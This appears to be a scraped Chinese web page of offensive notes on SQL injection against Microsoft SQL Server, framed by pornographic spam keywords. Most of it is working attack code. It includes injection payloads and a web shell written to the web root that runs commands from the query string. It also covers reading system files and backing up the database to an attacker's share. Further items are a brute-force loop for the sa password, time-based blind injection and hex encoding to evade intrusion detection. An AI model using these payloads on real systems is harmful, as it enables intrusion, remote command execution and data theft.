色琪琪一区二区三区亚洲区,专区另类欧美日韩,一区二区av在线

主頁 > 知識庫 > Mssql高級注入筆記II

Mssql高級注入筆記II

一些sql擴(kuò)展
xp_regaddmultistring
xp_regdeletekey 刪除鍵名
xp_regdeletevalue 刪除鍵值
xp_regenumkeys 枚舉
xp_regenumvalues
xp_regread 對于
xp_regremovemultistring
xp_regwrite 寫
xp_availablemedia 查看驅(qū)動器
xp_dirtree 看目錄
xp_enumdsn ODBC數(shù)據(jù)源
xp_loginconfig 一些服務(wù)器安全配置的信息
xp_makecab 打包，某些dbo權(quán)限先可做大用
xp_ntsec_enumdomains 枚舉域名相關(guān)信息
xp_terminate_process 終端進(jìn)程和ip啦
xp_logininfo 當(dāng)前登錄帳號
sp_configure 檢索數(shù)據(jù)庫中的內(nèi)容（我覺得這個挺有用的）
sp_helpextendedproc 得到所有的存儲擴(kuò)展
sp_who2 查詢用戶，他們登錄的主機(jī)，他們在數(shù)據(jù)庫中執(zhí)行的操作等等

一些網(wǎng)絡(luò)信息
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters',
'nullsessionshares'
SNMP輔助網(wǎng)絡(luò)踩點
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcomm
unities'

開始一些系統(tǒng)服務(wù),比如telnet，前提希望可以跑來admin或者一些系統(tǒng)密碼
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

Sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll' 此擴(kuò)展可以運行程序

使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。簡單地創(chuàng)建這個表：
create table foo( line varchar(8000) )
然后執(zhí)行bulk insert操作把文件中的數(shù)據(jù)插入到表中，如：
bulk insert foo from 'c:\inetpub\wwwroot\admin\inc.asp'

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
'S'參數(shù)為執(zhí)行查詢的服務(wù)器，'U'參數(shù)為用戶名，'P'參數(shù)為密碼，這里為'foobar'

SQL SERVER中提供了幾個內(nèi)置的允許創(chuàng)建ActiveX自動執(zhí)行腳本的存儲過程。這些腳本和運行在windows腳本解釋器下的腳本，或者ASP腳本程序一樣——他們使用VBScript或JavaScript書寫，他們創(chuàng)建自動執(zhí)行對象并和它們交互。一個自動執(zhí)行腳本使用這種方法書寫可以在Transact-SQL中做任何在ASP腳本中，或者WSH腳本中可以做的任何事情
使用'wscript.shell'對象建立了一個記事本的實例：
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'notepad.exe'
指定在用戶名后面來執(zhí)行它：
Username：'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'—

使用FSO讀一個已知的文本文件：
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

創(chuàng)建了一個能執(zhí)行通過提交的命令，默認(rèn)是asp那組權(quán)限的用戶下運行，前提是sp_oacreate擴(kuò)展存在
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'

sp_who '1' select * from sysobjects

針對局域網(wǎng)滲透,備份拖庫或者非sa用戶
declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat ,name=test;--
當(dāng)前數(shù)據(jù)庫就備份到你的硬盤上了
select * from openrowset(sqloledb,myserver;sa;,select * from table) 回連，默認(rèn)需要支持多語句查詢

添加登錄，使其成為固定服務(wù)器角色的成員。
語法
sp_addsrvrolemember [ @loginame = ] 'login'
[@rolename =] 'role'
參數(shù)
[@loginame =] 'login'
是添加到固定服務(wù)器角色的登錄名稱。login 的數(shù)據(jù)類型為 sysname，沒有默認(rèn)值。login 可以是 Microsoft? SQL Server? 登錄或 Microsoft Windows NT? 用戶帳戶。如果還沒有對該 Windows NT 登錄授予 SQL Server 訪問權(quán)限，那么將自動對其授予訪問權(quán)限。
[@rolename =] 'role'
要將登錄添加到的固定服務(wù)器角色的名稱。role 的數(shù)據(jù)類型為 sysname，默認(rèn)值為 NULL，它必須是下列值之一：
sysadmin
securityadmin
serveradmin
setupadmin
processadmin
diskadmin
dbcreator
bulkadmin
返回代碼值
0（成功）或 1（失敗）
注釋
在將登錄添加到固定服務(wù)器角色時，該登錄就會得到與此固定服務(wù)器角色相關(guān)的權(quán)限。
不能更改 sa 登錄的角色成員資格。
請使用 sp_addrolemember 將成員添加到固定數(shù)據(jù)庫角色或用戶定義的角色。
不能在用戶定義的事務(wù)內(nèi)執(zhí)行 sp_addsrvrolemember 存儲過程。
權(quán)限
sysadmin 固定服務(wù)器的成員可以將成員添加到任何固定服務(wù)器角色。固定服務(wù)器角色的成員可以執(zhí)行 sp_addsrvrolemember 將成員只添加到同一個固定服務(wù)器角色。
示例
下面的示例將 Windows NT 用戶 Corporate\HelenS 添加到 sysadmin 固定服務(wù)器角色中。
EXEC sp_addsrvrolemember 'Corporate\HelenS', 'sysadmin'

OPENDATASOURCE
不使用鏈接的服務(wù)器名，而提供特殊的連接信息，并將其作為四部分對象名的一部分。
語法
OPENDATASOURCE ( provider_name, init_string )
參數(shù)
provider_name
注冊為用于訪問數(shù)據(jù)源的 OLE DB 提供程序的 PROGID 的名稱。provider_name 的數(shù)據(jù)類型為 char，沒有默認(rèn)值。
init_string
連接字符串，這些字符串將要傳遞給目標(biāo)提供程序的 IDataInitialize 接口。提供程序字符串語法是以關(guān)鍵字值對為基礎(chǔ)的，這些關(guān)鍵字值對由分號隔開，例如："keyword1=value; keyword2=value."
在 Microsoft? Data Access SDK 中定義了基本語法。有關(guān)所支持的特定關(guān)鍵字值對的信息，請參見提供程序中的文檔。下表列出 init_string 參數(shù)中最常用的關(guān)鍵字。
關(guān)鍵字 OLE DB 屬性有效值和描述
數(shù)據(jù)源 DBPROP_INIT_DATASOURCE 要連接的數(shù)據(jù)源的名稱。不同的提供程序用不同的方法對此進(jìn)行解釋。對于 SQL Server OLE DB 提供程序來說，這會指明服務(wù)器的名稱。對于 Jet OLE DB 提供程序來說，這會指明 .mdb 文件或 .xls 文件的完整路徑。
位置 DBPROP_INIT_LOCATION 要連接的數(shù)據(jù)庫的位置。
擴(kuò)展屬性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的連接字符串。
連接超時 DBPROP_INIT_TIMEOUT 超時值，在該超時值后，連接嘗試將失敗。
用戶 ID DBPROP_AUTH_USERID 用于該連接的用戶 ID。
密碼 DBPROP_AUTH_PASSWORD 用于該連接的密碼。
目錄 DBPROP_INIT_CATALOG 連接到數(shù)據(jù)源時的初始或默認(rèn)的目錄名稱。

OPENDATASOURCE 函數(shù)可以在能夠使用鏈接服務(wù)器名的相同 Transact-SQL 語法位置中使用。因此，就可以將 OPENDATASOURCE 用作四部分名稱的第一部分，該名稱指的是 SELECT、INSERT、UPDATE 或 DELETE 語句中的表或視圖的名稱；或者指的是 EXECUTE 語句中的遠(yuǎn)程存儲過程。當(dāng)執(zhí)行遠(yuǎn)程存儲過程時，OPENDATASOURCE 應(yīng)該指的是另一個 SQL Server。OPENDATASOURCE 不接受參數(shù)變量。
與 OPENROWSET 函數(shù)類似，OPENDATASOURCE 應(yīng)該只引用那些不經(jīng)常訪問的 OLE DB 數(shù)據(jù)源。對于訪問次數(shù)稍多的任何數(shù)據(jù)源，請為它們定義鏈接的服務(wù)器。無論 OPENDATASOURCE 還是 OPENROWSET 都不能提供鏈接的服務(wù)器定義的全部功能，例如，安全管理以及查詢目錄信息的能力。每次調(diào)用 OPENDATASOURCE 時，都必須提供所有的連接信息（包括密碼）。
示例
下面的示例訪問來自某個表的數(shù)據(jù)，該表在 SQL Server 的另一個實例中。
SELECT *
FROM OPENDATASOURCE(
'SQLOLEDB',
'Data Source=ServerName;User ID=MyUID;Password=MyPass'
).Northwind.dbo.Categories

下面是個查詢的示例，它通過用于 Jet 的 OLE DB 提供程序查詢 Excel 電子表格。
SELECT *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

針對MSDASQL 用存儲過程建立的sql連接，在blackbox測試中，好象沒什么注入?yún)^(qū)別
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i  @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from
OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username +
N';pwd=' + @pwd + N''',''select @@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end

盲注技巧之一，時間延緩（可以加一個循環(huán)函數(shù)，運行查詢時間越久說說明當(dāng)前字段正確）
if (select user) = 'sa' waitfor delay '0:0:5'

if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
insert into pubs..tmp_file exec master..xp_fileexist 'c:\boot.ini'
if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'
if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'

字符對比
if (ascii(substring(@s, @byte, 1))  ( power(2, @bit))) > 0 waitfor
delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1))  ( power(2, 0))) > 0 waitfor delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1))  ( power(2, 1))) > 0 waitfor delay '0:0:5'

編碼的秘密，饒過IDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)

This runs 'select @@version', as does:

declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)

In the stored procedure example above we saw how a 'sysname' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:

sp_msdropretry [foo drop table logs select * from sysobjects], [bar]

嘻嘻，不知道這次被轉(zhuǎn)走以后會不會看到偶的名字呢？~要有的話，就把高級注入筆記I也發(fā)出來

標(biāo)簽：懷化重慶公主嶺麗江成都天津內(nèi)江臺灣

巨人網(wǎng)絡(luò)通訊聲明：本文標(biāo)題《Mssql高級注入筆記II》，本文關(guān)鍵詞 Mssql,高級,注入,筆記,Mssql,；如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題，煩請?zhí)峁┫嚓P(guān)信息告之我們，我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò)，涉及言論、版權(quán)與本站無關(guān)。

婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

Mssql高級注入筆記II